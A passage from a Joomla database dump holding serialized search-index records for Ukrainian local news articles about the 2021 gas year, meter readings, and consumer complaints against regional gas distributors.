;s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:22:\"2534:malinu-1130-rokiv\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:34:\"/8-novini-2/2534-malinu-1130-rokiv\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2534\";s:5:\"route\";s:75:\"index.php?option=com_content&view=article&id=2534:malinu-1130-rokiv&catid=8\";s:5:\"title\";s:30:\"Малину - 1130 років\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-09-12 05:33:18\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-09-12 05:33:18\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4938,'index.php?option=com_content&view=article&id=2535','index.php?option=com_content&view=article&id=2535:30-veresnya-2021-roku-ostannij-den-potochnogo-gazovogo-roku&catid=8','30 вересня 2021 року – останній день поточного газового року',' Увага! Сьогодні закінчується газовий рік, який тривав з 1 жовтня 2020 року по 30 вересня 2021 року. А отже, до 5 жовтня 2021 року усім побутовим споживачам обов’язково необхідно передати своєму облгазу фактичні покази власного лічильника станом на кінець вересня 2021 року. Переконайтесь, що ваші покази облгаз взяв до відома. Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року по 30 вересня 2021 року буде здійснюватися розрахунок щомісячної плати за доставку газу кожному домогосподарству на наступний період - з 1 січня 2022 року і впродовж усього 2022 року. Будьте пильними! Не дайте облгазу себе ошукати та домалювати вам віртуальні куби, яких ви насправді не споживали. З Кодексу ГРМ: 1. Розрахунки споживача за послугу розподілу природного газу, що надається Оператором ГРМ за договором розподілу природного газу, здійснюються виходячи з величини річної замовленої потужності об’єкта (об’єктів) споживача та оплачуються споживачем рівномірними частками протягом календарного року. 2. Місячна вартість послуги розподілу природного газу визначається як добуток 1/12 річної замовленоїпотужності об’єкта (об’єктів) споживача на тариф, встановлений Регулятором для відповідного Оператора ГРМ із розрахунку місячної вартості одного кубічного метра замовленої потужності. 3. Річна замовлена потужність (за замовчуванням) об’єкта (об’єктів) споживача на розрахунковий календарний рік визначається Оператором ГРМ виходячи з фактичного обсягу споживання природного газу цим об’єктом за газовий рік, що передував розрахунковому календарному року, який визначається відповідно до вимог цього Кодексу, крім випадків, передбачених цією главою. ','2021-09-30 14:14:04','4b8b3e69c4131ecfd6f6144fcd570ea4',1,1,1,'*','2021-09-30 11:11:30','0000-00-00 00:00:00','2021-09-30 11:11:30','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2535\";s:5:\"alias\";s:59:\"30-veresnya-2021-roku-ostannij-den-potochnogo-gazovogo-roku\";s:7:\"summary\";s:3313:\"<!--StartFragment--><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/0053333.gif\"><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/0053333.gif\"></a><br></p><p>Увага! Сьогодні закінчується газовий рік, який  тривав з 1 жовтня 2020 року по 30 вересня 2021 року. А  отже, до 5 жовтня 2021 року усім побутовим споживачам обов’язково  необхідно передати своєму облгазу фактичні покази власного лічильника станом на  кінець вересня 2021 року.</p><p>Переконайтесь, що ваші покази облгаз взяв до відома.  Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року  по 30 вересня 2021 року буде здійснюватися розрахунок щомісячної плати за  доставку газу кожному домогосподарству на наступний період - з 1 січня 2022  року і впродовж усього 2022 року. Будьте пильними! Не дайте облгазу себе  ошукати та домалювати вам віртуальні куби, яких ви насправді не споживали.</p><p>З Кодексу ГРМ:</p><p>1. Розрахунки споживача за послугу розподілу  природного газу, що надається Оператором ГРМ за договором розподілу природного  газу, здійснюються виходячи з величини річної замовленої потужності об’єкта  (об’єктів) споживача та оплачуються споживачем рівномірними частками протягом  календарного року.</p><p>2. Місячна вартість послуги розподілу природного газу  визначається як добуток 1/12 річної замовленої потужності об’єкта (об’єктів)  споживача на тариф, встановлений Регулятором для відповідного Оператора ГРМ із  розрахунку місячної вартості одного кубічного метра замовленої потужності.</p><p>3. Річна замовлена потужність (за замовчуванням)  об’єкта (об’єктів) споживача на розрахунковий календарний рік визначається  Оператором ГРМ виходячи з фактичного обсягу споживання природного газу цим  об’єктом за газовий рік, що передував розрахунковому календарному року, який  визначається відповідно до вимог цього Кодексу, крім випадків, передбачених  цією главою.</p><p><br></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-09-30 11:14:04\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:64:\"2535:30-veresnya-2021-roku-ostannij-den-potochnogo-gazovogo-roku\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:76:\"/8-novini-2/2535-30-veresnya-2021-roku-ostannij-den-potochnogo-gazovogo-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2535\";s:5:\"route\";s:117:\"index.php?option=com_content&view=article&id=2535:30-veresnya-2021-roku-ostannij-den-potochnogo-gazovogo-roku&catid=8\";s:5:\"title\";s:106:\"30 вересня 2021 року – останній день поточного газового року\";s:11:\"description\";s:3030:\" Увага! Сьогодні закінчується газовий рік, який тривав з 1 жовтня 2020 року по 30 вересня 2021 року. А отже, до 5 жовтня 2021 року усім побутовим споживачам обов’язково необхідно передати своєму облгазу фактичні покази власного лічильника станом на кінець вересня 2021 року. Переконайтесь, що ваші покази облгаз взяв до відома. Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року по 30 вересня 2021 року буде здійснюватися розрахунок щомісячної плати за доставку газу кожному домогосподарству на наступний період - з 1 січня 2022 року і впродовж усього 2022 року. Будьте пильними! Не дайте облгазу себе ошукати та домалювати вам віртуальні куби, яких ви насправді не споживали. З Кодексу ГРМ: 1. Розрахунки споживача за послугу розподілу природного газу, що надається Оператором ГРМ за договором розподілу природного газу, здійснюються виходячи з величини річної замовленої потужності об’єкта (об’єктів) споживача та оплачуються споживачем рівномірними частками протягом календарного року. 2. Місячна вартість послуги розподілу природного газу визначається як добуток 1/12 річної замовленоїпотужності об’єкта (об’єктів) споживача на тариф, встановлений Регулятором для відповідного Оператора ГРМ із розрахунку місячної вартості одного кубічного метра замовленої потужності. 3. Річна замовлена потужність (за замовчуванням) об’єкта (об’єктів) споживача на розрахунковий календарний рік визначається Оператором ГРМ виходячи з фактичного обсягу споживання природного газу цим об’єктом за газовий рік, що передував розрахунковому календарному року, який визначається відповідно до вимог цього Кодексу, крім випадків, передбачених цією главою. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-09-30 11:11:30\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-09-30 11:11:30\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4940,'index.php?option=com_content&view=article&id=2536','index.php?option=com_content&view=article&id=2536:shcho-robiti-yakshcho-oblgaz-ne-vrakhovue-pokazniki-vashogo-lichilnika-j-vimagae-splatiti-za-zajvi-kubi&catid=8','Що робити, якщо облгаз не враховує показники вашого лічильника й вимагає сплатити за «зайві» куби?',' Люди масово скаржаться на маніпуляції з показниками газових лічильників. Як йдеться в зверненнях до інформаційно-консультаційного центру ГазПравда, облгази ігнорують вчасно передані домогосподарствами показники лічильників. Натомість споживачам виставляються інші показники – значно вищі, ніж споживачі фіксують в особистих кабінетах. Незважаючи на обурення споживачів, облгази відмовляються коригувати показники лічильників, мотивуючи це тим, що ті невчасно надали відповідну інформацію – тобто, пізніше 6 числа календарного місяця, що настає за розрахунковим. У такому разі експерти ГазПравди радять подавати претензію щодо завищених показів лічильників до облгазу, а також одразу скаргу до НКРЕКП. Адже часто газорозподільна компанія просто ігнорує звернення або відмовляє споживачам. Тому регулятор мав би звернути свою увагу на такі факти. ГазПравда підготувала зразки таких претензій та скарг. Документи розміщені на нашому сайті в розділі Бланки. Також претензію до облгазу щодо здійснення перерахунку за фактичними показниками лічильника можна скачати тут: https://gazpravda.com.ua/images/2021/Pretenziia_do_oblgaz_pokaz_lich.doc Скарга до регулятора про незаконні нарахування на основі завищених показників лічильника доступна за посиланням: https://gazpravda.com.ua/images/2021/Skarga_do_NKREKP_pokaz_lich.doc Зазначимо, що одна з ймовірних причин подібних маніпуляцій облгазів – це штучне завищення фактичного споживання газу домогосподарствами в поточному газовому році з метою отримання надприбутків при нарахуванні плати за доставку/розподіл блакитного палива у 2022 році. Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року по 30 вересня 2021 року облгаз буде здійснювати розрахунок щомісячної плати за доставку/розподіл газу кожному домогосподарству вже з січня 2022 року та протягом усього 2022 року. За матеріалами https://gazpravda.com.ua/ ','2021-10-19 20:10:07','2d8234475d35b0bfddb48e6f2269c5c8',1,1,1,'*','2021-10-19 17:08:52','0000-00-00 00:00:00','2021-10-19 17:08:52','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2536\";s:5:\"alias\";s:103:\"shcho-robiti-yakshcho-oblgaz-ne-vrakhovue-pokazniki-vashogo-lichilnika-j-vimagae-splatiti-za-zajvi-kubi\";s:7:\"summary\";s:3817:\"<!--StartFragment--><p>Люди масово скаржаться на маніпуляції з показниками газових лічильників.<a class=\"modal\" href=\"https://malehus.in.ua/images/stories/unnamed.jpg\"><img src=\"https://malehus.in.ua/images/stories/unnamed.jpg\" alt=\"\" class=\"fr-fir\" width=\"440\"></a></p><p>Як йдеться в зверненнях до інформаційно-консультаційного центру ГазПравда, облгази ігнорують вчасно передані домогосподарствами показники лічильників. Натомість споживачам виставляються інші показники – значно вищі, ніж споживачі фіксують в особистих кабінетах.</p><p>Незважаючи на обурення споживачів, облгази відмовляються коригувати показники лічильників, мотивуючи це тим, що ті невчасно надали відповідну інформацію – тобто, пізніше 6 числа календарного місяця, що настає за розрахунковим.</p><p>У такому разі експерти ГазПравди радять подавати претензію щодо завищених показів лічильників до облгазу, а також одразу скаргу до НКРЕКП. Адже часто газорозподільна компанія просто ігнорує звернення або відмовляє споживачам. Тому регулятор мав би звернути свою увагу на такі факти.</p><p>ГазПравда підготувала зразки таких претензій та скарг. Документи розміщені на нашому сайті в розділі Бланки.</p><p>Також претензію до облгазу щодо здійснення перерахунку за фактичними показниками лічильника можна скачати тут:&nbsp;<a href=\"https://gazpravda.com.ua/images/2021/Pretenziia_do_oblgaz_pokaz_lich.doc\">https://gazpravda.com.ua/images/2021/Pretenziia_do_oblgaz_pokaz_lich.doc</a></p><p>Скарга до регулятора про незаконні нарахування на основі завищених показників лічильника доступна за посиланням:&nbsp;<a href=\"https://gazpravda.com.ua/images/2021/Skarga_do_NKREKP_pokaz_lich.doc\">https://gazpravda.com.ua/images/2021/Skarga_do_NKREKP_pokaz_lich.doc</a></p><p>Зазначимо, що одна з ймовірних причин подібних маніпуляцій облгазів – це штучне завищення фактичного споживання газу домогосподарствами в поточному газовому році з метою отримання надприбутків при нарахуванні плати за доставку/розподіл блакитного палива у 2022 році. Адже саме на підставі фактично спожитого газу за період із 1 жовтня 2020 року по 30 вересня 2021 року облгаз буде здійснювати розрахунок щомісячної плати за доставку/розподіл газу кожному домогосподарству вже з січня 2022 року та протягом усього 2022 року.</p><p>За матеріалами&nbsp;<a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/</a></p><!--EndFragment-->\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-10-19 17:10:07\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:108:\"2536:shcho-robiti-yakshcho-oblgaz-ne-vrakhovue-pokazniki-vashogo-lichilnika-j-vimagae-splatiti-za-zajvi-kubi\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super 